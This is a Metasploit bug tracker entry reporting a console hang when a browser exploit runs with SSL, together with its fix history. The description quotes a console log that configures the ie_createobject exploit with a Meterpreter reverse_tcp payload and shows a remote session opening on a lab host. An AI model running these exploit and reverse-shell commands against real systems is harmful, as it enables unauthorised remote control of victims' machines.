Bug #1079

Browser exploit with SSL set hangs the console

Added by HD Moore almost 2 years ago. Updated over 1 year ago.

Status:Closed Start date:03/11/2010
Priority:Normal Due date:
Assignee:HD Moore % Done:

100%
Category:-
Target version:Metasploit 3.4.0
Resolution: Release Note:

Description

msf exploit(ie_createobject) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_createobject) > set LHOST 192.168.0.228 
LHOST => 192.168.0.228
msf exploit(ie_createobject) > save
Saved configuration to: /home/hdm/.msf3/config
msf exploit(ie_createobject) > rexploit 
[*] Exploit running as background job.
msf exploit(ie_createobject) > 
[*] Started reverse handler on 192.168.0.228:4444 
[*] Using URL: http://0.0.0.0:8443/
[*]  Local IP: http://192.168.0.228:8443/
[*] Server started.
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.0.105:1280...
[*] Sending EXE payload to 192.168.0.105:1280...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.105:1281)

The console hangs with the exploit thread eating 100% CPU. Likely caused by a read() returning nil somewhere and the socket not being closed.

Associated revisions

Revision 89c62bc8
Added by HD Moore almost 2 years ago

Fixes #1079. Handle a closed SSL socket gracefully

git-svn-id: file:///home/svn/framework3/trunk@8783 4d416f70-5f16-0410-b530-b9f4589650da

History

#1
Updated by HD Moore almost 2 years ago

  • Status changed from New to Resolved
  • % Done changed from 0 to 100

Applied in changeset r8783.

#2
Updated by HD Moore almost 2 years ago

  • Target version changed from 18 to Metasploit 3.4.0

#3
Updated by Jonathan Cran over 1 year ago

  • Status changed from Resolved to Closed

resolved -> closed

Also available in: Atom PDF